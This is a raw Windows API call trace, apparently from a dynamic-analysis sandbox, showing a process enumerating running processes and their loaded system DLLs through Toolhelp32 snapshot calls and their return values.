	[0105.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\userenv.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\userenv.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="userenv.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="userenv.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.509] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\profext.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\profext.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profext.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="profext.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.510] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntmarta.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntmarta.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntmarta.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntmarta.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.511] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SHELL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SHELL32.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHELL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHELL32.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.512] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\schannel.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\schannel.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="schannel.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="schannel.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.513] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPT32.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPT32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPT32.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.514] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSASN1.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSASN1.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.515] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\mskeyprotect.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\mskeyprotect.dll", lpUsedDefaultChar=0x0) returned 37
	[0105.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mskeyprotect.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mskeyprotect.dll", lpUsedDefaultChar=0x0) returned 17
	[0105.516] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ncrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ncrypt.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ncrypt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncrypt.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.517] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\NTASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\NTASN1.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NTASN1.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NTASN1.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.518] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\ncryptsslp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\ncryptsslp.dll", lpUsedDefaultChar=0x0) returned 35
	[0105.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ncryptsslp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncryptsslp.dll", lpUsedDefaultChar=0x0) returned 15
	[0105.520] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\DPAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\DPAPI.DLL", lpUsedDefaultChar=0x0) returned 30
	[0105.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DPAPI.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DPAPI.DLL", lpUsedDefaultChar=0x0) returned 10
	[0105.521] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\WINTRUST.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\WINTRUST.dll", lpUsedDefaultChar=0x0) returned 33
	[0105.522] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINTRUST.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINTRUST.dll", lpUsedDefaultChar=0x0) returned 13
	[0105.522] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTSP.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTSP.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTSP.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTSP.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.523] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 1
	[0105.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\rsaenh.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\rsaenh.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rsaenh.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rsaenh.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.524] Module32NextW (hSnapshot=0x83c, lpme=0x20af280) returned 0
	[0105.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 14
	[0105.525] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1
	[0105.526] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x9cc) returned 0xffffffff
	[0105.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24
	[0105.529] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1
	[0105.530] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xa38) returned 0xffffffff
	[0105.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13
	[0105.532] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0105.533] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xae0) returned 0xffffffff
	[0105.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12
	[0105.535] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0105.536] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x924) returned 0xffffffff
	[0105.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12
	[0105.553] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0105.554] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x310) returned 0x844
	[0105.603] Module32FirstW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.604] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.605] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.606] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.606] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.623] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.623] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.624] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.625] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.626] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.627] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.628] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.628] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.643] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.644] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.645] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.646] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.646] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.647] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.648] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.649] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.650] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.650] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.651] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.652] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.653] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.654] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 0
	[0105.655] Module32FirstW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\SkypeHost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\WindowsApps\\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\\SkypeHost.exe", lpUsedDefaultChar=0x0) returned 95
	[0105.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 14
	[0105.657] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.658] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0105.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0105.658] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0105.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0105.659] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.660] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.661] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.662] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.663] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.664] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0105.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0105.665] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0105.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0105.666] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.666] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.667] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.668] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.669] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.670] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.671] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.672] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.673] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.674] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.675] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.676] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.677] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.692] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.692] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 1
	[0105.693] Module32NextW (hSnapshot=0x844, lpme=0x20af280) returned 0
	[0105.694] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0105.695] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xc50) returned 0xffffffff
